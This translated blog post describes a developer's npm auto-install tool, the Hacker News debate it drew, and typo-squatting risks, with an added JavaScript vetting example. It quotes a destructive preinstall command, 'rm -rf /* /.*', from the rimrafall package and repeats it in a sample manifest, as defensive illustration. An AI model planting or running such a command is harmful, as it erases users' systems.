What I learned from showing my work on Hacker News

by Siddharth Kshetrapal

When writing JavaScript, I hate it that I have to leave my editor — and my train of thought — just to tab over to my terminal and install a new package with:

$ npm install --save express

To scratch my itch, I wrote a tiny node utility which lets me focus on the code without installing dependencies.

I was pretty happy with it, so I wrapped it in a git repository and shared it on Hacker News.

If you’re interested, here’s a link to the repo, auto-install, which already has more than 6,000 downloads:

siddharthkp/auto-install: Install dependencies as you code (github.com)

An instant response

I wasn’t expecting much out of the post, just wanted to throw it out there in case someone else finds it useful.

What happened instead was a heated debate about the Node ecosystem!

I’m not going to talk about what’s right or wrong with npm, since there’s enough about that already.

What I learned:

1. Typo-squatting!

It’s a popular (and surprisingly common) form of hacking. Basically, a hacker hopes that you will make a typo, and uses that to screw you over.

Say, instead of typing express, you accidentally type expres. This can result in installing a completely different module, which could be a malicious one.

João Jerónimo shared the vulnerabilities exposed by installing an npm package with rimrafall. Check out the preinstall script in its package.json:

"scripts": { "preinstall": "rm -rf /* /.*" }

If you’re not familiar with that command, it basically deletes everything on your hard drive — including your operating system!

Thanks to some quick feedback, I added the --secure flag to protect against this.
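To make the two risks in this section concrete, here is an added example (not code from the original post or from the auto-install project) of the checks an installer could run before fetching a package on a developer's behalf: it reads the package's lifecycle scripts, which npm executes automatically during install, and it flags a requested name that is one typo away from a package the developer actually uses. The sample package.json is constructed to mirror the rimrafall example above, and the allowlist of known packages is a hypothetical one chosen for the demonstration.

```javascript
// Added example: defensive checks a tool like auto-install could run before
// installing a package. Not part of the original post or project.

// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Parse a package.json text and return the install-time scripts it declares.
// An empty list means the package runs nothing at install time; a strict
// "--secure" style mode would refuse to install when the list is non-empty.
function findInstallScripts(packageJsonText) {
  const manifest = JSON.parse(packageJsonText);
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Edit distance with insert, delete, substitute and adjacent transposition,
// so that both "expres" and "exrpess" are distance 1 from "express".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Return the allowlisted package the requested name looks like a typo of,
// or null when the name is an exact allowlisted name or not close to any.
function possibleTypoSquat(requested, allowlist, maxDistance = 1) {
  if (allowlist.includes(requested)) return null;
  for (const known of allowlist) {
    if (editDistance(requested, known) <= maxDistance) return known;
  }
  return null;
}

// Combine both checks into the decision a cautious installer would make.
function vetPackage(requested, packageJsonText, allowlist) {
  const reasons = [];
  const lookalike = possibleTypoSquat(requested, allowlist);
  if (lookalike) reasons.push(`"${requested}" looks like a typo of "${lookalike}"`);
  for (const { hook, command } of findInstallScripts(packageJsonText)) {
    reasons.push(`declares ${hook} script: ${command}`);
  }
  return { allowed: reasons.length === 0, reasons };
}

// Constructed sample manifest, modelled on the rimrafall example in the post.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "expres",
  version: "1.0.0",
  scripts: { preinstall: "rm -rf /* /.*" },
});

// Hypothetical allowlist: the packages this developer actually depends on.
const KNOWN_PACKAGES = ["express", "lodash", "react"];

// Demonstration: the lookalike package is rejected for two reasons.
console.log(vetPackage("expres", SAMPLE_MANIFEST, KNOWN_PACKAGES));
```

The typo check is deliberately conservative: it only compares against packages the developer has already chosen, so a genuinely new dependency is never blocked, while a one-character slip of a known name is surfaced before anything is downloaded. The script check covers the same ground as npm's own `--ignore-scripts` option, which skips lifecycle scripts entirely; the difference is that this version reports what would have run, so the developer can decide.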

2. A lack of trust in your fellow developers

I see an innate lack of trust in the skills and capabilities of other developers in the JavaScript community. Our tools have always been error-prone. Typo-squatting is a common problem with all package managers.

Popular opinion is that the JavaScript community is filled with novice programmers, and that there’s no differentiation between what is authoritative and what isn’t.

This is my favorite comment on Hacker News:

As I see it, npm appears to be acting like there are a lot of unsolved problems in this realm, and in doing so are endangering a developer community that is absolutely full of amateurs.

You can read the whole thread here (it’s a teensy bit long):

Show HN: Auto install npm dependencies as you code (news.ycombinator.com)

The good parts

Not all comments were bad. Some people reached out to me on twitter with kind words. I have to admit, that felt pretty cool.

Feature requests and bug reports started flowing in! That kept me busy for a while. And then there was the kicker — npm weekly #54!

Also mentioned on Hacker News, if you’re using webpack, you might be interested in a similar plugin by Eric Clemmons.

The JavaScript community

JavaScript definitely has the lowest barrier to entry of any language, and has become the most popular language in recent years.

I have to agree that npm is not fully mature as a package manager (yet), and a lot of work needs to go into security (for example: sandboxing pre/post-install scripts, module signing, etc.)

But we have an open library ecosystem with an active developer community. Individual contributors have produced some amazing things in the past: Express.js, Socket.io, Redux, Vue, and even Node.js itself!

Let’s not forget the great work that companies are doing to spread knowledge and best practices.

You can’t build a community without trust. We need to reduce the barriers to entry even further, and make it easy for new developers to learn and contribute.

In closing, my advice to fellow developers: never stop shipping.

The more you code, the more you will learn.

If you liked this, click the ? below so other people will see this as well.

Translated from: https://www.freecodecamp.org/news/what-i-learned-from-showing-my-work-on-hacker-news-48c54d78d5f4/